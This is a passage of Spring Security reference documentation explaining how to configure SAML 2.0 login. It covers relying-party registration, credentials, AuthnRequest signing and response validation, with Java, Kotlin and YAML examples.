browser.\n\nimage:{icondir}\/number_6.png[] The browser then POSTs the `<saml2:Response>` to the assertion consumer service endpoint.\n\n[[servlet-saml2login-authentication-saml2webssoauthenticationfilter]]\n.Authenticating a `<saml2:Response>`\nimage::{figures}\/saml2webssoauthenticationfilter.png[]\n\nThe figure builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> diagram.\n\nimage:{icondir}\/number_1.png[] When the browser submits a `<saml2:Response>` to the application, it <<servlet-saml2login-authenticate-responses, delegates to `Saml2WebSsoAuthenticationFilter`>>.\nThis filter calls its configured `AuthenticationConverter` to create a `Saml2AuthenticationToken` by extracting the response from the `HttpServletRequest`.\nThis converter additionally resolves the <<servlet-saml2login-relyingpartyregistration, `RelyingPartyRegistration`>> and supplies it to `Saml2AuthenticationToken`.\n\nimage:{icondir}\/number_2.png[] Next, the filter passes the token to its configured <<servlet-authentication-providermanager,`AuthenticationManager`>>.\nBy default, it will use the <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>>.\n\nimage:{icondir}\/number_3.png[] If authentication fails, then __Failure__\n\n* The <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>> is cleared out.\n* The <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is invoked to restart the authentication process.\n\nimage:{icondir}\/number_4.png[] If authentication is successful, then __Success__.\n\n* The <<servlet-authentication-authentication, `Authentication`>> is set on the <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>>.\n* The `Saml2WebSsoAuthenticationFilter` invokes `FilterChain#doFilter(request,response)` to continue with the rest of the application logic.\n\n[[servlet-saml2login-minimaldependencies]]\n=== Minimal Dependencies\n\nSAML 2.0 service provider support resides in `spring-security-saml2-service-provider`.\nIt builds off of the OpenSAML library.\n\n[[servlet-saml2login-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a service provider consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the necessary asserting party metadata.\n\n[NOTE]\nAlso, this presupposes that you've already <<servlet-saml2login-metadata, registered the relying party with your asserting party>>.\n\n==== Specifying Identity Provider Metadata\n\nIn a Spring Boot application, to specify an identity provider's metadata, simply do:\n\n[source,yml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n registration:\n adfs:\n identityprovider:\n entity-id: https:\/\/idp.example.com\/issuer\n verification.credentials:\n - certificate-location: \"classpath:idp.crt\"\n singlesignon.url: https:\/\/idp.example.com\/issuer\/sso\n singlesignon.sign-request: false\n----\n\nwhere\n\n* `https:\/\/idp.example.com\/issuer` is the value contained in the `Issuer` attribute of the SAML responses that the identity provider will issue\n* `classpath:idp.crt` is the location on the classpath for the identity provider's certificate for verifying SAML responses, and\n* `https:\/\/idp.example.com\/issuer\/sso` is the endpoint where the identity provider is expecting `AuthnRequest` s.\n\nAnd that's it!\n\n[NOTE]\nIdentity Provider and Asserting Party are synonymous, as are Service Provider and Relying Party.\nThese are frequently abbreviated as AP and RP, respectively.\n\n==== Runtime Expectations\n\nAs configured above, the application processes any `+POST \/login\/saml2\/sso\/{registrationId}+` request containing a `SAMLResponse` parameter:\n\n[source,html]\n----\nPOST \/login\/saml2\/sso\/adfs HTTP\/1.1\n\nSAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZ...\n----\n\nThere are two ways to see induce your asserting party to generate a `SAMLResponse`:\n\n* First, you can navigate to your asserting party.\nIt likely has some kind of link or button for each registered relying party that you can click to send the `SAMLResponse`.\n* Second, you can navigate to a protected page in your app, for example, `http:\/\/localhost:8080`.\nYour app then redirects to the configured asserting party which then sends the `SAMLResponse`.\n\nFrom here, consider jumping to:\n\n* <<servlet-saml2login-architecture,How SAML 2.0 Login Integrates with OpenSAML>>\n* <<servlet-saml2login-authenticatedprincipal,How to Use the `Saml2AuthenticatedPrincipal`>>\n* <<servlet-saml2login-sansboot,How to Override or Replace Spring Boot's Auto Configuration>>\n\n[[servlet-saml2login-architecture]]\n=== How SAML 2.0 Login Integrates with OpenSAML\n\nSpring Security's SAML 2.0 support has a couple of design goals:\n\n* First, rely on a library for SAML 2.0 operations and domain objects.\nTo achieve this, Spring Security uses OpenSAML.\n* Second, ensure this library is not required when using Spring Security's SAML support.\nTo achieve this, any interfaces or classes where Spring Security uses OpenSAML in the contract remain encapsulated.\nThis makes it possible for you to switch out OpenSAML for some other library or even an unsupported version of OpenSAML.\n\nAs a natural outcome of the above two goals, Spring Security's SAML API is quite small relative to other modules.\nInstead, classes like `OpenSamlAuthenticationRequestFactory` and `OpenSamlAuthenticationProvider` expose `Converter` s that customize various steps in the authentication process.\n\nFor example, once your application receives a `SAMLResponse` and delegates to `Saml2WebSsoAuthenticationFilter`, the filter will delegate to `OpenSamlAuthenticationProvider`.\n\n.Authenticating an OpenSAML `Response`\nimage:{figures}\/opensamlauthenticationprovider.png[]\n\nThis figure builds off of the <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter` diagram>>.\n\nimage:{icondir}\/number_1.png[] The `Saml2WebSsoAuthenticationFilter` formulates the `Saml2AuthenticationToken` and invokes the <<servlet-authentication-providermanager,`AuthenticationManager`>>.\n\nimage:{icondir}\/number_2.png[] The <<servlet-authentication-providermanager,`AuthenticationManager`>> invokes the `OpenSamlAuthenticationProvider`.\n\nimage:{icondir}\/number_3.png[] The authentication provider deserializes the response into an OpenSAML `Response` and checks its signature.\nIf the signature is invalid, authentication fails.\n\nimage:{icondir}\/number_4.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedAssertion` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_5.png[] Next, the provider validates the response's `Issuer` and `Destination` values.\nIf they don't match what's in the `RelyingPartyRegistration`, authentication fails.\n\nimage:{icondir}\/number_6.png[] After that, the provider verifies the signature of each `Assertion`.\nIf any signature is invalid, authentication fails.\nAlso, if neither the response nor the assertions have signatures, authentication fails.\nEither the response or all the assertions must have signatures.\n\nimage:{icondir}\/number_7.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedID` or `EncryptedAttribute` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_8.png[] Next, the provider validates each assertion's `ExpiresAt` and `NotBefore` timestamps, the `<Subject>` and any `<AudienceRestriction>` conditions.\nIf any validations fail, authentication fails.\n\nimage:{icondir}\/number_9.png[] Following that, the provider takes the first assertion's `AttributeStatement` and maps it to a `Map<String, List<Object>>`.\nIt also grants the `ROLE_USER` granted authority.\n\nimage:{icondir}\/number_10.png[] And finally, it takes the `NameID` from the first assertion, the `Map` of attributes, and the `GrantedAuthority` and constructs a `Saml2AuthenticatedPrincipal`.\nThen, it places that principal and the authorities into a `Saml2Authentication`.\n\nThe resulting `Authentication#getPrincipal` is a Spring Security `Saml2AuthenticatedPrincipal` object, and `Authentication#getName` maps to the first assertion's `NameID` element.\n\n[[servlet-saml2login-opensaml-customization]]\n==== Customizing OpenSAML Configuration\n\nAny class that uses both Spring Security and OpenSAML should statically initialize `OpenSamlInitializationService` at the beginning of the class, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.initialize();\n}\n----\n\nThis replaces OpenSAML's `InitializationService#initialize`.\n\nOccasionally, it can be valuable to customize how OpenSAML builds, marshalls, and unmarshalls SAML objects.\nIn these circumstances, you may instead want to call `OpenSamlInitializationService#requireInitialize(Consumer)` that gives you access to OpenSAML's `XMLObjectProviderFactory`.\n\nFor example, when sending an unsigned AuthNRequest, you may want to force reauthentication.\nIn that case, you can register your own `AuthnRequestMarshaller`, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.requireInitialize(factory -> {\n\t\tAuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {\n\t\t\t@Override\n public Element marshall(XMLObject object, Element element) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, element);\n }\n\n public Element marshall(XMLObject object, Document document) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, document);\n }\n\n private void configureAuthnRequest(AuthnRequest authnRequest) {\n\t\t\t\tauthnRequest.setForceAuthN(true);\n }\n\t\t}\n\n\t factory.getMarshallerFactory().registerMarshaller(AuthnRequest.DEFAULT_ELEMENT_NAME, marshaller);\n\t});\n}\n----\n\nThe `requireInitialize` method may only be called once per application instance.\n\n[[servlet-saml2login-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates for a relying party.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a relying party.\nWhen including `spring-security-saml2-service-provider`, the `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n saml2Login { }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nYou can replace this by exposing the bean within the application:\n\n.Custom SAML 2.0 Login Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n }\n }\n }\n}\n----\n====\n\nThe above requires the role of `USER` for any URL that starts with `\/messages\/`.\n\n[[servlet-saml2login-relyingpartyregistrationrepository]]\nThe second `@Bean` Spring Boot creates is a {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistrationRepository.html[`RelyingPartyRegistrationRepository`], which represents the asserting party and relying party metadata.\nThis includes things like the location of the SSO endpoint the relying party should use when requesting authentication from the asserting party.\n\nYou can override the default by publishing your own `RelyingPartyRegistrationRepository` bean.\nFor example, you can look up the asserting party's configuration by hitting its metadata endpoint like so:\n\n.Relying Party Registration Repository\n====\n[source,java]\n----\n@Value(\"${metadata.location}\")\nString assertingPartyMetadataLocation;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n\tRelyingPartyRegistration registration = RelyingPartyRegistrations\n .fromMetadataLocation(assertingPartyMetadataLocation)\n .registrationId(\"example\")\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\nOr you can provide each detail manually, as you can see below:\n\n.Relying Party Registration Repository Manual Configuration\n====\n[source,java]\n----\n@Value(\"${verification.key}\")\nFile verificationKey;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() throws Exception {\n X509Certificate certificate = X509Support.decodeCertificate(this.verificationKey);\n Saml2X509Credential credential = Saml2X509Credential.verification(certificate);\n RelyingPartyRegistration registration = RelyingPartyRegistration\n .withRegistrationId(\"example\")\n .assertingPartyDetails(party -> party\n .entityId(\"https:\/\/idp.example.com\/issuer\")\n .singleSignOnServiceLocation(\"https:\/\/idp.example.com\/SSO.saml2\")\n .wantAuthnRequestsSigned(false)\n .verificationX509Credentials(c -> c.add(credential))\n )\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\n[NOTE]\nNote that `X509Support` is an OpenSAML class, used here in the snippet for brevity\n\n[[servlet-saml2login-relyingpartyregistrationrepository-dsl]]\n\nAlternatively, you can directly wire up the repository using the DSL, which will also override the auto-configured `WebSecurityConfigurerAdapter`:\n\n.Custom Relying Party Registration DSL\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .relyingPartyRegistrationRepository(relyingPartyRegistrations())\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n relyingPartyRegistrationRepository = relyingPartyRegistrations()\n }\n }\n }\n}\n----\n====\n\n[NOTE]\nA relying party can be multi-tenant by registering more than one relying party in the `RelyingPartyRegistrationRepository`.\n\n[[servlet-saml2login-relyingpartyregistration]]\n=== RelyingPartyRegistration\nA {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistration.html[`RelyingPartyRegistration`]\ninstance represents a link between an relying party and assering party's metadata.\n\nIn a `RelyingPartyRegistration`, you can provide relying party metadata like its `Issuer` value, where it expects SAML Responses to be sent to, and any credentials that it owns for the purposes of signing or decrypting payloads.\n\nAlso, you can provide asserting party metadata like its `Issuer` value, where it expects AuthnRequests to be sent to, and any public credentials that it owns for the purposes of the relying party verifying or encrypting payloads.\n\nThe following `RelyingPartyRegistration` is the minimum required for most setups:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations\n .fromMetadataLocation(\"https:\/\/ap.example.org\/metadata\")\n .registrationId(\"my-id\")\n .build();\n----\n\nThough a more sophisticated setup is also possible, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"my-id\")\n .entityId(\"{baseUrl}\/{registrationId}\")\n .decryptionX509Credentials(c -> c.add(relyingPartyDecryptingCredential()))\n .assertionConsumerServiceLocation(\"\/my-login-endpoint\/{registrationId}\")\n .assertingParty(party -> party\n .entityId(\"https:\/\/ap.example.org\")\n .verificationX509Credentials(c -> c.add(assertingPartyVerifyingCredential()))\n .singleSignOnServiceLocation(\"https:\/\/ap.example.org\/SSO.saml2\")\n );\n----\n\n[TIP]\nThe top-level metadata methods are details about the relying party.\nThe methods inside `assertingPartyDetails` are details about the asserting party.\n\n[NOTE]\nThe location where a relying party is expecting SAML Responses is the Assertion Consumer Service Location.\n\nThe default for the relying party's `entityId` is `+{baseUrl}\/saml2\/service-provider-metadata\/{registrationId}+`.\nThis is this value needed when configuring the asserting party to know about your relying party.\n\nThe default for the `assertionConsumerServiceLocation` is `+\/login\/saml2\/sso\/{registrationId}+`.\nIt's mapped by default to <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter`>> in the filter chain.\n\n[[servlet-saml2login-rpr-uripatterns]]\n==== URI Patterns\n\nYou probably noticed in the above examples the `+{baseUrl}+` and `+{registrationId}+` placeholders.\n\nThese are useful for generating URIs. As such, the relying party's `entityId` and `assertionConsumerServiceLocation` support the following placeholders:\n\n* `baseUrl` - the scheme, host, and port of a deployed application\n* `registrationId` - the registration id for this relying party\n* `baseScheme` - the scheme of a deployed application\n* `baseHost` - the host of a deployed application\n* `basePort` - the port of a deployed application\n\nFor example, the `assertionConsumerServiceLocation` defined above was:\n\n`+\/my-login-endpoint\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+\/my-login-endpoint\/adfs+`\n\nThe `entityId` above was defined as:\n\n`+{baseUrl}\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+https:\/\/rp.example.com\/adfs+`\n\n[[servlet-saml2login-rpr-credentials]]\n==== Credentials\n\nYou also likely noticed the credential that was used.\n\nOftentimes, a relying party will use the same key to sign payloads as well as decrypt them.\nOr it will use the same key to verify payloads as well as encrypt them.\n\nBecause of this, Spring Security ships with `Saml2X509Credential`, a SAML-specific credential that simplifies configuring the same key for different use cases.\n\nAt a minimum, it's necessary to have a certificate from the asserting party so that the asserting party's signed responses can be verified.\n\nTo construct a `Saml2X509Credential` that you'll use to verify assertions from the asserting party, you can load the file and use\nthe `CertificateFactory` like so:\n\n[source,java]\n----\nResource resource = new ClassPathResource(\"ap.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tX509Certificate certificate = (X509Certificate)\n CertificateFactory.getInstance(\"X.509\").generateCertificate(is);\n\treturn Saml2X509Credential.verification(certificate);\n}\n----\n\nLet's say that the asserting party is going to also encrypt the assertion.\nIn that case, the relying party will need a private key to be able to decrypt the encrypted value.\n\nIn that case, you'll need an `RSAPrivateKey` as well as its corresponding `X509Certificate`.\nYou can load the first using Spring Security's `RsaKeyConverters` utility class and the second as you did before:\n\n[source,java]\n----\nX509Certificate certificate = relyingPartyDecryptionCertificate();\nResource resource = new ClassPathResource(\"rp.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tRSAPrivateKey rsa = RsaKeyConverters.pkcs8().convert(is);\n\treturn Saml2X509Credential.decryption(rsa, certificate);\n}\n----\n\n[TIP]\nWhen you specify the locations of these files as the appropriate Spring Boot properties, then Spring Boot will perform these conversions for you.\n\n[[servlet-saml2login-rpr-relyingpartyregistrationresolver]]\n==== Resolving the Relying Party from the Request\n\nAs seen so far, Spring Security resolves the `RelyingPartyRegistration` by looking for the registration id in the URI path.\n\nThere are a number of reasons you may want to customize. Among them:\n\n* You may know that you will never be a multi-tenant application and so want to have a simpler URL scheme\n* You may identify tenants in a way other than by the URI path\n\nTo customize the way that a `RelyingPartyRegistration` is resolved, you can configure a custom `Converter<HttpServletRequest, RelyingPartyRegistration>`.\nThe default looks up the registration id from the URI's last path element and looks it up in your `RelyingPartyRegistrationRepository`.\n\nYou can provide a simpler resolver that, for example, always returns the same relying party:\n\n[source,java]\n----\npublic class SingleRelyingPartyRegistrationResolver\n implements Converter<HttpServletRequest, RelyingPartyRegistration> {\n\n\t@Override\n public RelyingPartyRegistration convert(HttpServletRequest request) {\n\t\treturn this.relyingParty;\n }\n}\n----\n\nThen, you can provide this resolver to the appropriate filters that <<servlet-saml2login-sp-initiated-factory, produce `<saml2:AuthnRequest>` s>>, <<servlet-saml2login-authenticate-responses, authenticate `<saml2:Response>` s>>, and <<servlet-saml2login-metadata, produce `<saml2:SPSSODescriptor>` metadata>>.\n\n[NOTE]\nRemember that if you have any placeholders in your `RelyingPartyRegistration`, your resolver implementation should resolve them.\n\n[[servlet-saml2login-rpr-duplicated]]\n==== Duplicated Relying Party Configurations\n\nWhen an application uses multiple asserting parties, some configuration is duplicated between `RelyingPartyRegistration` instances:\n\n* The relying party's `entityId`\n* Its `assertionConsumerServiceLocation`, and\n* Its credentials, for example its signing or decryption credentials\n\nWhat's nice about this setup is credentials may be more easily rotated for some identity providers vs others.\n\nThe duplication can be alleviated in a few different ways.\n\nFirst, in YAML this can be alleviated with references, like so:\n\n[source,yaml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n signing.credentials: &relying-party-credentials\n - private-key-location: classpath:rp.key\n - certificate-location: classpath:rp.crt\n identityprovider:\n entity-id: ...\n azure:\n signing.credentials: *relying-party-credentials\n identityprovider:\n entity-id: ...\n----\n\nSecond, in a database, it's not necessary to replicate `RelyingPartyRegistration` 's model.\n\nThird, in Java, you can create a custom configuration method, like so:\n\n[source,java]\n----\nprivate RelyingPartyRegistration.Builder\n addRelyingPartyDetails(RelyingPartyRegistration.Builder builder) {\n\n\tSaml2X509Credential signingCredential = ...\n\tbuilder.signingX509Credentials(c -> c.addAll(signingCredential));\n\t\/\/ ... other relying party configurations\n}\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n RelyingPartyRegistration okta = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(oktaMetadataUrl)\n .registrationId(\"okta\")).build();\n\n RelyingPartyRegistration azure = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(oktaMetadataUrl)\n .registrationId(\"azure\")).build();\n\n return new InMemoryRelyingPartyRegistrationRepository(okta, azure);\n}\n----\n\n[[servlet-saml2login-sp-initiated-factory]]\n=== Producing `<saml2:AuthnRequest>` s\n\nAs stated earlier, Spring Security's SAML 2.0 support produces a `<saml2:AuthnRequest>` to commence authentication with the asserting party.\n\nSpring Security achieves this in part by registering the `Saml2WebSsoAuthenticationRequestFilter` in the filter chain.\nThis filter by default responds to endpoint `+\/saml2\/authenticate\/{registrationId}+`.\n\nFor example, if you were deployed to `https:\/\/rp.example.com` and you gave your registration an ID of `okta`, you could navigate to:\n\n`https:\/\/rp.example.org\/saml2\/authenticate\/ping`\n\nand the result would be a redirect that included a `SAMLRequest` parameter containing the signed, deflated, and encoded `<saml2:AuthnRequest>`.\n\n[[servlet-saml2login-sp-initiated-factory-signing]]\n==== Changing How the `<saml2:AuthnRequest>` Gets Sent\n\nBy default, Spring Security signs each `<saml2:AuthnRequest>` and send it as a GET to the asserting party.\n\nMany asserting parties don't require a signed `<saml2:AuthnRequest>`.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n\n.Not Requiring Signed AuthnRequests\n====\n.Boot\n[source,yaml,role=\"primary\"]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n identityprovider:\n entity-id: ...\n singlesignon.sign-request: false\n----\n\n.Java\n[source,java,role=\"secondary\"]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .wantAuthnRequestsSigned(false)\n );\n----\n====\n\nOtherwise, you will need to specify a private key to `RelyingPartyRegistration#signingX509Credentials` so that Spring Security can sign the `<saml2:AuthnRequest>` before sending.\n\n[[servlet-saml2login-sp-initiated-factory-algorithm]]\nBy default, Spring Security will sign the `<saml2:AuthnRequest>` using `rsa-sha256`, though some asserting parties will require a different algorithm, as indicated in their metadata.\n\nYou can configure the algorithm based on the asserting party's <<servlet-saml2login-relyingpartyregistrationrepository,metadata using `RelyingPartyRegistrations`>>.\n\nOr, you can provide it manually:\n\n[source,java]\n----\nString metadataLocation = \"classpath:asserting-party-metadata.xml\";\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations.fromMetadataLocation(metadataLocation)\n \/\/ ...\n .assertingPartyDetails((party) -> party\n \/\/ ...\n .signingAlgorithms((sign) -> sign.add(SignatureConstants.ALGO_ID_SIGNATURE_RSA_SHA512))\n );\n----\n\nNOTE: The snippet above uses the OpenSAML `SignatureConstants` class to supply the algorithm name.\nBut, that's just for convenience.\nSince the datatype is `String`, you can supply the name of the algorithm directly.\n\n[[servlet-saml2login-sp-initiated-factory-binding]]\nSome asserting parties require that the `<saml2:AuthnRequest>` be POSTed.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .singleSignOnServiceBinding(Saml2MessageType.POST)\n );\n----\n\n\n[[servlet-saml2login-sp-initiated-factory-custom-authnrequest]]\n==== Customizing OpenSAML's `AuthnRequest` Instance\n\nThere are a number of reasons that you may want to adjust an `AuthnRequest`.\nFor example, you may want `ForceAuthN` to be set to `true`, which Spring Security sets to `false` by default.\n\nIf you don't need information from the `HttpServletRequest` to make your decision, then the easiest way is to <<servlet-saml2login-opensaml-customization,register a custom `AuthnRequestMarshaller` with OpenSAML>>.\nThis will give you access to post-process the `AuthnRequest` instance before it's serialized.\n\nBut, if you do need something from the request, then you can use create a custom `Saml2AuthenticationRequestContext` implementation and then a `Converter<Saml2AuthenticationRequestContext, AuthnRequest>` to build an `AuthnRequest` yourself, like so:\n\n[source,java]\n----\n@Component\npublic class AuthnRequestConverter implements\n Converter<MySaml2AuthenticationRequestContext, AuthnRequest> {\n\n\tprivate final AuthnRequestBuilder authnRequestBuilder;\n\tprivate final IssuerBuilder issuerBuilder;\n\n\t\/\/ ... constructor\n\n\tpublic AuthnRequest convert(Saml2AuthenticationRequestContext context) {\n\t\tMySaml2AuthenticationRequestContext myContext = (MySaml2AuthenticationRequestContext) context;\n\t\tIssuer issuer = issuerBuilder.buildObject();\n\t\tissuer.setValue(myContext.getIssuer());\n\n\t\tAuthnRequest authnRequest = authnRequestBuilder.buildObject();\n\t\tauthnRequest.setIssuer(iss);\n authnRequest.setDestination(myContext.getDestination());\n\t\tauthnRequest.setAssertionConsumerServiceURL(myContext.getAssertionConsumerServiceUrl());\n\n\t\t\/\/ ... additional settings\n\n\t\tauthRequest.setForceAuthn(myContext.getForceAuthn());\n\t\treturn authnRequest;\n\t}\n}\n----\n\nThen, you can construct your own `Saml2AuthenticationRequestContextResolver` and `Saml2AuthenticationRequestFactory` and publish them as `@Bean` s:\n\n[source,java]\n----\n@Bean\nSaml2AuthenticationRequestContextResolver authenticationRequestContextResolver() {\n\tSaml2AuthenticationRequestContextResolver resolver =\n new DefaultSaml2AuthenticationRequestContextResolver();\n\treturn request -> {\n Saml2AuthenticationRequestContext context = resolver.resolve(request);\n return new MySaml2AuthenticationRequestContext(context, request.getParameter(\"force\") != null);\n\t};\n}\n\n@Bean\nSaml2AuthenticationRequestFactory authenticationRequestFactory(\n\t\tAuthnRequestConverter authnRequestConverter) {\n\n\tOpenSamlAuthenticationRequestFactory authenticationRequestFactory =\n new OpenSamlAuthenticationRequestFactory();\n\tauthenticationRequestFactory.setAuthenticationRequestContextConverter(authnRequestConverter);\n\treturn authenticationRequestFactory;\n}\n----\n\n[[servlet-saml2login-authenticate-responses]]\n=== Authenticating `<saml2:Response>` s\n\nTo verify SAML 2.0 Responses, Spring Security uses <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>> by default.\n\nYou can configure this in a number of ways including:\n\n1. Setting a clock skew to timestamp validation\n2. Mapping the response to a list of `GrantedAuthority` instances\n3. Customizing the strategy for validating assertions\n4. Customizing the strategy for decrypting response and assertion elements\n\nTo configure these, you'll use the `saml2Login#authenticationManager` method in the DSL.\n\n[[servlet-saml2login-opensamlauthenticationprovider-clockskew]]\n==== Setting a Clock Skew\n\nIt's not uncommon for the asserting and relying parties to have system clocks that aren't perfectly synchronized.\nFor that reason, you can configure `OpenSamlAuthenticationProvider` 's default assertion validator with some tolerance:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setAssertionValidator(OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator(assertionToken -> {\n \t\t\tMap<String, Object> params = new HashMap<>();\n \t\t\tparams.put(CLOCK_SKEW, Duration.ofMinutes(10).toMillis());\n \t\t\t\/\/ ... other validation parameters\n \t\t\treturn new ValidationContext(params);\n \t\t})\n );\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n\n[[servlet-saml2login-opensamlauthenticationprovider-userdetailsservice]]\n==== Coordinating with a `UserDetailsService`\n\nOr, perhaps you would like to include user details from a legacy `UserDetailsService`.\nIn that case, the response authentication converter can come in handy, as can be seen below:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n @Autowired\n UserDetailsService userDetailsService;\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setResponseAuthenticationConverter(responseToken -> {\n \tSaml2Authentication authentication = OpenSamlAuthenticationProvider\n .createDefaultResponseAuthenticationConverter() <1>\n .convert(responseToken);\n \tAssertion assertion = responseToken.getResponse().getAssertions().get(0);\n String username = assertion.getSubject().getNameID().getValue();\n UserDetails userDetails = this.userDetailsService.loadUserByUsername(username); <2>\n return MySaml2Authentication(userDetails, authentication); <3>\n });\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n<1> First, call the default converter, which extracts attributes and authorities from the response\n<2> Second, call the <<servlet-authentication-userdetailsservice, `UserDetailsService`>> using the relevant information\n<3> Third, return a custom authentication that includes the user details\n\n[NOTE]\nIt's not required to call `OpenSamlAuthenticationProvider` 's default authentication converter.\nIt returns a `Saml2AuthenticatedPrincipal` containing the attributes it extracted from `AttributeStatement` s as well as the single `ROLE_USER` authority.\n\n[[servlet-saml2login-opensamlauthenticationprovider-additionalvalidation]]\n==== Performing Additional Validation\n\n`OpenSamlAuthenticationProvider` performs minimal validation on SAML 2.0 Assertions.\nAfter verifying the signature, it will:\n\n1. Validate `<AudienceRestriction>` and `<DelegationRestriction>` conditions\n2. Validate `<SubjectConfirmation>` s, expect for any IP address information\n\nTo perform additional validation, you can configure your own assertion validator that delegates to `OpenSamlAuthenticationProvider` 's default and then 